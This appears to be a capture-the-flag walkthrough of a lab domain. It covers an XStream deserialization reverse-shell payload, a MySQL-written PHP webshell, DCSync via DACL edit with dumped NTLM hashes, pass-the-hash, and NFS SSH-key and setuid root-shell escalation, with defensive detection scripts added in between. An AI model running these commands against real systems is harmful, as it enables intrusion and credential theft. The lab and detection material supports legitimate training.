Chunqiu Cloud Range (春秋云境) - Delivery

Learning points

1. NFS attacks and privilege escalation: Linux privilege escalation basics, sharing and discussion


172.22.13.14 ubuntu external-facing Spring server
172.22.13.57 centos NFS server
172.22.13.28 WIN-HAUWOLAO.xiaorang.lab OA office platform, MySQL weak password root/123456
172.22.13.6 WIN-DC.xiaorang.lab domain controller

XStream

Anonymous FTP is enabled; after connecting, pom.xml shows the application uses XStream, so exploit the CVE-2021-29505 deserialization.

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,...}|{base64,-d}|{bash,-i}"
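The pom.xml found on the FTP share is what tells the defender the same thing it told the attacker: which XStream version is shipped. The script below is an added example, not code from the writeup, that parses a Maven pom.xml and flags an XStream dependency below 1.4.17 (the release carrying the CVE-2021-29505 fix). The sample pom content is constructed; property expansion via ${...} is handled because that is how versions are usually declared.

```python
# Added example (not from the writeup): check a Maven pom.xml for an XStream
# dependency older than the release that fixes CVE-2021-29505.
import xml.etree.ElementTree as ET

POM_NS = "{http://maven.apache.org/POM/4.0.0}"

# Constructed sample pom.xml, modelled on the file found on the anonymous FTP share.
SAMPLE_POM = """<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId>
  <artifactId>delivery</artifactId>
  <version>1.0</version>
  <properties>
    <xstream.version>1.4.15</xstream.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId>
      <version>${xstream.version}</version>
    </dependency>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <version>2.5.0</version>
    </dependency>
  </dependencies>
</project>
"""

XSTREAM_FIXED = (1, 4, 17)  # first XStream release with the CVE-2021-29505 fix


def parse_version(text):
    """Turn '1.4.15' into (1, 4, 15). Non-numeric suffixes are dropped, which is
    conservative: '1.4.17-rc' becomes (1, 4) and is still flagged."""
    parts = []
    for piece in text.strip().split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def resolve_property(value, props):
    """Expand a ${name} reference using <properties>; unknown names stay as-is."""
    if value.startswith("${") and value.endswith("}"):
        return props.get(value[2:-1], value)
    return value


def find_dependencies(pom_text):
    """Return [(groupId, artifactId, version)] with property references resolved."""
    root = ET.fromstring(pom_text)
    props = {}
    for prop in root.findall(f"{POM_NS}properties/*"):
        props[prop.tag.replace(POM_NS, "")] = (prop.text or "").strip()
    deps = []
    for dep in root.iter(f"{POM_NS}dependency"):
        gid = dep.findtext(f"{POM_NS}groupId", default="").strip()
        aid = dep.findtext(f"{POM_NS}artifactId", default="").strip()
        ver = dep.findtext(f"{POM_NS}version", default="").strip()
        deps.append((gid, aid, resolve_property(ver, props)))
    return deps


def vulnerable_xstream(pom_text):
    """Return the declared XStream version if it is below 1.4.17, else None."""
    for gid, aid, ver in find_dependencies(pom_text):
        if gid == "com.thoughtworks.xstream" and aid == "xstream":
            parsed = parse_version(ver)
            if parsed and parsed < XSTREAM_FIXED:
                return ver
    return None


if __name__ == "__main__":
    hit = vulnerable_xstream(SAMPLE_POM)
    print("xstream", hit, "-> upgrade to 1.4.17 or later" if hit else "ok")
```

Run it against any pom.xml that is reachable from outside (as here, over anonymous FTP); a version below 1.4.17, or one that cannot be resolved, is the finding. A fuller check would also walk the dependency tree that Maven resolves transitively, which this single-file parser does not see.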

fscan

[*] Icmp alive hosts len is: 4
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:139 open
172.22.13.28:8000 open
172.22.13.14:8080 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[+] mysql 172.22.13.28:3306:root 123456

Lateral movement: web

The MySQL instance behind the internal web service has a weak password; once connected it turns out to be a phpStudy install, so write a webshell.

select "<?php @eval($_POST['pass']);?>" into outfile "C:\\phpstudy_pro\\www\\shell.php"

The web service runs as SYSTEM and the host is domain-joined; start gathering information.

C:/phpstudy_pro/WWW/ >net user /domain
\\WIN-DC.xiaorang.lab 的用户帐户
-------------------------------------------------------------
Administrator chenglei Guest
krbtgt zhangtao zhangwen

chenglei is a member of the ACL Admin group; mimikatz recovers the credential chenglei/Xt61f3LBhg1


ACL abuse

Domain user chenglei belongs to the Acl admin group, so the user can be granted DCSync rights directly and the hashes dumped.

Dacledit

impacket-dacledit xiaorang.lab/chenglei:Xt61f3LBhg1 -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250524-034234.bak
[*] DACL modified successfully!

Dcsync

impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.6 -target-ip 172.22.13.6 -dc-ip 172.22.13.6 -just-dc-ntlm -user-status
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cb976ec1a1bf8a14a15142c6fecc540e::: (status=Disabled)
zhangwen:1104:aad3b435b51404eeaad3b435b51404ee:fa7d776fdfc82d3f43c9d8b7f5312d77::: (status=Enabled)
chenglei:1105:aad3b435b51404eeaad3b435b51404ee:0c00801c30594a1b8eaa889d237c5382::: (status=Enabled)
zhangtao:1106:aad3b435b51404eeaad3b435b51404ee:e786c4a4987ced162c496d0519496729::: (status=Enabled)
WIN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:473c26f05506785c543cec4ab896fc58::: (status=Enabled)
WIN-HAUWOLAO$:1103:aad3b435b51404eeaad3b435b51404ee:559508d63ea2452ac185ddc11dc872b5::: (status=Enabled)
[*] Cleaning up...
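Both steps above leave traces in the domain controller's Security log: the dacledit call writes the domain object's nTSecurityDescriptor (event 5136), and the secretsdump DRSUAPI replication request is a control-access operation on the domain object carrying the replication extended-rights GUIDs (event 4662). The following detection is an added example, not part of the writeup. The event records are constructed to mirror the EventData fields of those two events; DC_ACCOUNTS and REPLICATION_ALLOWLIST are assumed values that a real deployment would fill from its own inventory.

```python
# Added example (not from the writeup): flag a DACL write on the domain object
# and a replication request from an account that is not a domain controller.
import re

# Well-known extended-rights GUIDs that DRSUAPI replication (DCSync) exercises.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: DC machine accounts plus an explicit allowlist
# (e.g. a directory-sync service account). Assumed values for this example.
DC_ACCOUNTS = {"WIN-DC$"}
REPLICATION_ALLOWLIST = set()

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample events shaped like the EventData of Security events 5136 and 4662.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "chenglei",
     "ObjectDN": "DC=xiaorang,DC=lab", "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "chenglei", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "WIN-DC$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "zhangwen", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_guids(properties):
    """Return the replication-rights GUIDs present in a 4662 Properties field."""
    return [g.lower() for g in GUID_RE.findall(properties) if g.lower() in REPLICATION_GUIDS]


def is_replication_account(name):
    """DC machine accounts and allowlisted sync accounts are expected to replicate."""
    return name in DC_ACCOUNTS or name in REPLICATION_ALLOWLIST


def detect(events):
    """Return a list of (rule, account, detail) findings over the given events."""
    findings = []
    for ev in events:
        user = ev.get("SubjectUserName", "")
        if ev.get("EventID") == 4662:
            hits = replication_guids(ev.get("Properties", ""))
            if hits and not is_replication_account(user):
                names = ", ".join(REPLICATION_GUIDS[g] for g in hits)
                findings.append(("possible DCSync", user, names))
        elif ev.get("EventID") == 5136:
            if ev.get("AttributeLDAPDisplayName", "").lower() == "ntsecuritydescriptor":
                findings.append(("DACL modified", user, ev.get("ObjectDN", "")))
    return findings


if __name__ == "__main__":
    for rule, account, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {account} ({detail})")
```

Event 4662 only exists when the Directory Service Access audit subcategory is enabled, and 5136 needs Directory Service Changes auditing together with a SACL on the domain object; without those settings the detection has nothing to read. Pairing the two findings on the same account within a short window, as happens in this writeup, is the higher-confidence signal.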

PTH

impacket-wmiexec xiaorang.lab/Administrator@172.22.13.6 -hashes :6341235defdaed66fb7b682665752c9a -codec GBK -shell-type powershell

NFS

NFS listens on port 2049 by default; rpcinfo shows whether the host is running NFS or has NFS mounts.

proxychains4 -q rpcinfo -p 172.22.13.57

List the directories that can be mounted

proxychains4 -q showmount -e 172.22.13.57

It is a user's home directory, so the share can be mounted and an SSH key written into it. Mounting from Kali hangs, so switch to the entry host (ubuntu) and install the NFS client packages: https://gist.github.com/zkryakgul/bb561235b7f36c57d15a015d20c7e336


Mount and write the SSH key

root@ubuntu:/tmp# mount -t nfs 172.22.13.57:/home/joyce /tmp/nfs_mount
root@ubuntu:/tmp# df -h
root@ubuntu:/tmp# ssh-keygen -t rsa -b 4096
root@ubuntu:/tmp# mkdir /tmp/nfs_mount/.ssh
root@ubuntu:/tmp# cd /tmp/nfs_mount/.ssh
root@ubuntu:/tmp# cat /root/.ssh/id_rsa.pub >> authorized_keys
root@ubuntu:/tmp# ssh joyce@172.22.13.57

SUID: ftp found, used for privilege escalation


Start an FTP server on ubuntu

python3 -m pyftpdlib -p 6666 -u test -P test -w &


From the NFS host, connect to the FTP server and push the txt file over

ftp 172.22.13.14 6666
test/test
put /flag02.txt
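The setuid ftp client is the kind of finding a host baseline should catch before an intruder does. Below is an added example, not code from the writeup, that compares the setuid/setgid files on a system against an expected allowlist and reports anything outside it. BASELINE is an assumed list standing in for one taken from a known-good image; the sample entries are constructed so the classification logic can run without a real filesystem.

```python
# Added example (not from the writeup): report setuid/setgid files that are
# not in a known-good baseline.
import os
import stat

# Assumed baseline of setuid/setgid binaries expected on the host; a real one
# comes from a known-good image of the same distribution.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su",
            "/usr/bin/mount", "/usr/bin/umount"}

# Constructed sample (path, st_mode) pairs: 0o100000 is S_IFREG, 0o4000 setuid,
# 0o2000 setgid. ftp carries the setuid bit here, as on the NFS host above.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/ftp", 0o104755),
    ("/usr/bin/ls", 0o100755),
    ("/usr/bin/wall", 0o102755),
]


def classify(entries, baseline=BASELINE):
    """Given (path, st_mode) pairs, return (path, bits, status) for every regular
    file with setuid or setgid set; status is 'baseline' or 'UNEXPECTED'."""
    report = []
    for path, mode in entries:
        if not stat.S_ISREG(mode):
            continue
        bits = []
        if mode & stat.S_ISUID:
            bits.append("setuid")
        if mode & stat.S_ISGID:
            bits.append("setgid")
        if not bits:
            continue
        status = "baseline" if path in baseline else "UNEXPECTED"
        report.append((path, "+".join(bits), status))
    return report


def scan(root="/"):
    """Walk a tree with lstat (symlinks are not followed) and classify what it finds."""
    entries = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                entries.append((path, os.lstat(path).st_mode))
            except OSError:
                continue  # unreadable or vanished entry; skip it
    return classify(entries)


if __name__ == "__main__":
    for path, bits, status in scan("/usr/bin"):
        print(f"{status:10} {bits:13} {path}")
```

The useful output is the UNEXPECTED rows; a setuid ftp is one of them, and the fix is to remove the bit (chmod u-s) or the binary. Running the scan periodically and diffing against the previous run turns it into a simple integrity check.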

There is another privilege escalation route; it requires the no_root_squash export option to be enabled

root@ubuntu:/tmp# echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > root.c
root@ubuntu:/tmp# gcc root.c -o root
root.c: In function ‘main’:
root.c:1:14: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
| ^~~~~~
root.c:1:25: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
| ^~~~~~
root.c:1:36: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
1 | int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
| ^~~~~~
root@ubuntu:/tmp# chmod +s ./root
root@ubuntu:/tmp# mv ./root nfs_mount/


[joyce@centos tmp]$ cd ~
[joyce@centos ~]$ ls
root
[joyce@centos ~]$ ./root
[root@centos ~]# cat /flag*
[ASCII-art banner whose spacing was lost in extraction; the letters read "Shadow Credentials"]
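The two NFS paths above depend on export options, not on a bug: a home directory exported to every host with rw lets clients write .ssh/authorized_keys, and no_root_squash lets a client's root keep uid 0 on the share. The following is an added example, not part of the writeup, that parses an /etc/exports file in exports(5) format and reports those conditions; the sample exports content is constructed to include both the writeup's conditions and some safe entries for contrast.

```python
# Added example (not from the writeup): audit /etc/exports for the conditions
# that made the NFS host above exploitable.
import re

# Constructed sample in exports(5) syntax; not the range's real configuration.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/home/joyce   *(rw,sync,no_root_squash)
/srv/share    172.22.13.0/24(ro,sync,root_squash)
/data         10.0.0.5(rw,sync,no_subtree_check) 10.0.0.6(rw,insecure)
/opt/pub      *(ro)
"""

# One "client(opt,opt)" token; the option list is optional.
ENTRY_RE = re.compile(r"(\S+?)(?:\((.*?)\))?(?=\s|$)")
WILDCARDS = {"*", "0.0.0.0/0", "::/0"}


def parse_exports(text):
    """Yield (path, client, options_set) for every client of every export line.
    A line with no client list is exported to everyone, so '*' is assumed."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path = parts[0]
        rest = parts[1] if len(parts) > 1 else "*"
        for client, opts in ENTRY_RE.findall(rest):
            options = {o.strip() for o in opts.split(",") if o.strip()}
            yield path, client, options


def assess(path, client, options):
    """Return a list of findings for one (path, client) export entry."""
    findings = []
    writable = "rw" in options
    world = client in WILDCARDS or client.startswith("*")
    if "no_root_squash" in options:
        findings.append("no_root_squash: a client's root keeps uid 0 on this export")
    if world:
        findings.append("exported to every host" + (" with write access" if writable else ""))
    if "insecure" in options:
        findings.append("insecure: requests from unprivileged source ports are accepted")
    if path == "/home" or path.startswith("/home/"):
        findings.append("home directory exported: .ssh/authorized_keys is reachable by clients")
    return findings


def audit_exports(text):
    """Return {path: {client: [findings]}} for entries that have at least one finding."""
    report = {}
    for path, client, options in parse_exports(text):
        found = assess(path, client, options)
        if found:
            report.setdefault(path, {})[client] = found
    return report


if __name__ == "__main__":
    for path, clients in audit_exports(SAMPLE_EXPORTS).items():
        for client, found in clients.items():
            for item in found:
                print(f"{path} -> {client}: {item}")
```

The remediation for the sample's first line is the inverse of each finding: restrict the client list to the hosts that need it, drop no_root_squash so root_squash (the default) maps remote root to nobody, and avoid exporting home directories at all. The parser does not model the exports(5) quirk where a space before the parenthesis applies the options to everyone; a linter for production use should warn on that too.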


flag02: flag{955bc5d2-9fe2-446e-8009-927ae5b32cf2}

hint: relay race